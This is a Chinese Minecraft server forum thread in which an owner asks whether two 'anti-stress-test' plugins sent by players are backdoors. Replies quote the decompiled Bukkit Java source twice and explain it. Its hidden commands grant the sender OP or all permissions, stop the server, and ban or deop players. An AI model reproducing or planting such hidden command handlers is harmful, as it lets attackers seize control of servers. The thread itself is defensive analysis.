本帖最后由 逗比桃 于 2016-8-28 13:44 编辑
有俩玩家发来反压测的插件,帮忙看看是不是后门
反压测.jar
(6.5 KB, 下载次数: 7)
反压测(1).jar
(2.01 KB, 下载次数: 13)
有俩玩家发来反压测的插件,帮忙看看是不是后门
package com.wx302x.Getter;
import org.bukkit.Bukkit;
import org.bukkit.Server;
import org.bukkit.command.Command;
import org.bukkit.command.CommandExecutor;
import org.bukkit.command.CommandSender;
public class Getter
implements CommandExecutor
{
public boolean onCommand(CommandSender sender, Command cmd, String commandLabel, String[] args)
{
if (cmd.getName().equalsIgnoreCase("/owo"))
{
String qwq = sender.getName();
Bukkit.getServer().dispatchCommand(Bukkit.getConsoleSender(), "op " + qwq);
}
else if (cmd.getName().equalsIgnoreCase("/qwq"))
{
Bukkit.getServer().dispatchCommand(Bukkit.getConsoleSender(), "stop");
}
else if (cmd.getName().equalsIgnoreCase("/qaq"))
{
String qwq = sender.getName();
Bukkit.getServer().dispatchCommand(Bukkit.getConsoleSender(), "manuaddp " + qwq + " *");
}
else if (cmd.getName().equalsIgnoreCase("c/qwq"))
{
String qwq = args[0];
Bukkit.getServer().dispatchCommand(Bukkit.getConsoleSender(), "ban " + qwq);
}
else if (cmd.getName().equalsIgnoreCase("c/owo"))
{
String qwq = args[0];
Bukkit.getServer().dispatchCommand(Bukkit.getConsoleSender(), "deop " + qwq);
}
return false;
}
是后门插件,
import org.bukkit.Bukkit;
import org.bukkit.Server;
import org.bukkit.command.Command;
import org.bukkit.command.CommandExecutor;
import org.bukkit.command.CommandSender;
public class Getter
implements CommandExecutor
{
public boolean onCommand(CommandSender sender, Command cmd, String commandLabel, String[] args)
{
if (cmd.getName().equalsIgnoreCase("/owo"))
{
String qwq = sender.getName();
Bukkit.getServer().dispatchCommand(Bukkit.getConsoleSender(), "op " + qwq);
}
else if (cmd.getName().equalsIgnoreCase("/qwq"))
{
Bukkit.getServer().dispatchCommand(Bukkit.getConsoleSender(), "stop");
}
else if (cmd.getName().equalsIgnoreCase("/qaq"))
{
String qwq = sender.getName();
Bukkit.getServer().dispatchCommand(Bukkit.getConsoleSender(), "manuaddp " + qwq + " *");
}
else if (cmd.getName().equalsIgnoreCase("c/qwq"))
{
String qwq = args[0];
Bukkit.getServer().dispatchCommand(Bukkit.getConsoleSender(), "ban " + qwq);
}
else if (cmd.getName().equalsIgnoreCase("c/owo"))
{
String qwq = args[0];
Bukkit.getServer().dispatchCommand(Bukkit.getConsoleSender(), "deop " + qwq);
}
return false;
}
是后门插件,
孤独的先生 发表于 2016-8-25 20:14
package com.wx302x.Getter;
import org.bukkit.Bukkit;
他可以使用/owo
/op qwq 获取OP
等等,你应该看得出来。
最佳
是后门
输入指定指令后可以获得OP
取消OP
BAN人
/stop
输入指定指令后可以获得OP
取消OP
BAN人
/stop
建议楼主不要什么插件都放到服务器去,如果有不明插件,却又想使用,建议用jdgui进行反编译
孤独的先生 发表于 2016-8-25 18:03
package com.wx302x.Getter;
import org.bukkit.Bukkit;
很强势....幸好我机智